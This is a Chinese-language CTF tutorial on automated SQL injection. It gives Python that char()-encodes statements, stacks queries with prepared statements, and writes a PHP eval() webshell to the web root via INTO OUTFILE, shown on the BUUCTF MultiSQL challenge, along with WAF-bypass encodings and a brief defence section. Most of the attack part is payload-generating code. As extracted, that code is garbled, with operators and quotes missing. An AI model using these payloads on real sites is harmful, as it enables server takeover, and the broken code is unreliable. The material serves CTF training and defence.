Python自动化SQL注入从字符编码到实战GetShell的高级技巧在CTF竞赛中SQL注入始终是Web安全赛道的核心考点。当面对严格的关键词过滤时传统的手工注入往往举步维艰。本文将深入探讨如何通过Python脚本自动化构造char()编码Payload结合堆叠注入与预处理语句实现高级绕过最终在BUUCTF靶场完成GetShell的全过程。1. 理解SQL注入过滤与编码绕过的本质现代Web应用通常会部署WAF或自定义过滤机制来防御SQL注入。典型的过滤策略包括关键词黑名单过滤select、union、and、or等敏感词特殊字符限制禁止管道符(|)、与符号()等运算符语法结构检测识别非常规的SQL语句拼接面对这些限制char()函数编码提供了一种优雅的绕过方案。其核心原理是将原始SQL语句的每个字符转换为对应的ASCII十进制数值通过char()函数重组执行。例如# 原始语句 original select test # 转换后 encoded char(115,101,108,101,99,116,32,39,116,101,115,116,39)这种编码方式具有三个显著优势规避关键词检测WAF无法直接识别被拆解的字符序列保留完整功能重组后的语句与原始SQL语义完全一致灵活组合可与预处理语句等特性结合使用2. 构建自动化编码转换工具手工转换char()编码效率低下且容易出错。下面我们开发一个Python脚本来自动化这个过程def sql_to_char(sql_statement): char_codes [] for i, char in enumerate(sql_statement): code ord(char) if i 0: char_codes.append(fchar({code}) else: char_codes.append(f,{code}) return .join(char_codes) ) # 示例转换写入WebShell的语句 webshell_sql select ?php eval($_POST[_]);? into outfile /var/www/html/shell.php encoded_payload sql_to_char(webshell_sql) print(encoded_payload)这个基础版本可以进一步优化分块处理避免生成过长的char()序列导致执行失败随机混淆插入无关参数干扰WAF检测多编码支持支持hex、unicode等替代编码方式3. 堆叠注入与预处理语句的完美组合单纯的char()编码还不够我们需要利用堆叠注入(Stacked Queries)和预处理语句(Prepared Statements)构建完整攻击链payload_template 2;set sql{encoded_sql}; prepare stmt from sql; execute stmt; def build_full_payload(encoded_sql): return payload_template.format(encoded_sqlencoded_sql)这种组合攻击的工作流程通过分号(;)执行堆叠注入将编码后的SQL存入变量准备预处理语句最终执行恶意操作注意堆叠注入的成功与否取决于后端数据库配置MySQL在PHP中通常不支持但在某些框架下可能生效4. 实战BUUCTF靶场突破以[SUCTF 2018]MultiSQL题目为例演示完整攻击流程识别注入点发现?id参数存在布尔盲注特征绕过过滤确认select、union等关键词被过滤验证堆叠注入测试分号是否能够执行多语句构造Payloadwebshell ?php eval($_POST[cmd]);? path /var/www/html/favicon/shell.php sql fselect {webshell} into outfile {path} encoded sql_to_char(sql) full_payload build_full_payload(encoded) print(f最终Payload: ?id{urllib.parse.quote(full_payload)})执行验证访问写入的shell.php确认WebShell生效5. 防御视角如何防护此类攻击作为开发者应当采取多层防御策略防御层具体措施有效性输入过滤参数化查询★★★★★权限控制限制数据库写权限★★★★☆配置加固禁用堆叠查询★★★★☆WAF规则检测char()编码模式★★★☆☆日志监控审计异常查询行为★★★★☆特别提醒几个关键防御点禁用多语句执行修改数据库配置allowMultiQueriesfalse限制文件写入撤销数据库用户的FILE权限过滤特殊字符即使使用参数化查询也应过滤分号等符号6. 扩展技巧其他编码绕过方法除了char()编码CTF中还常见以下绕过技术十六进制编码SELECT 0x73656C656374202A2066726F6D207573657273CONCAT拼接SELECT CONCAT(sel,ect) FROM users注释混淆SEL/*xxx*/ECT * FROM users大小写变异SeLeCt * FrOm users双重URL编码%2520代替空格每种方法都有其适用场景和限制条件实际测试中往往需要组合使用。7. Python自动化测试框架集成将上述技术整合到自动化测试工具中class SQLiEncoder: def __init__(self): self.encoders { char: self._char_encode, hex: self._hex_encode, unicode: self._unicode_encode } def _char_encode(self, sql): codes [str(ord(c)) for c in sql] return fchar({,.join(codes)}) def generate_payloads(self, sql): return {name: encoder(sql) for name, encoder in self.encoders.items()}这个框架可以一键生成多种编码Payload自动测试不同注入点记录成功绕过的方式生成详细的测试报告8. 真实环境与CTF的区别虽然CTF中的技术具有教育意义但真实环境存在重要差异防护措施更完善商业WAF具备行为分析能力后果更严重非法渗透可能涉及法律责任环境更复杂网络架构、权限控制多层级漏洞更隐蔽通常需要链式利用多个弱点建议仅在授权测试环境中实践这些技术并始终遵循道德准则。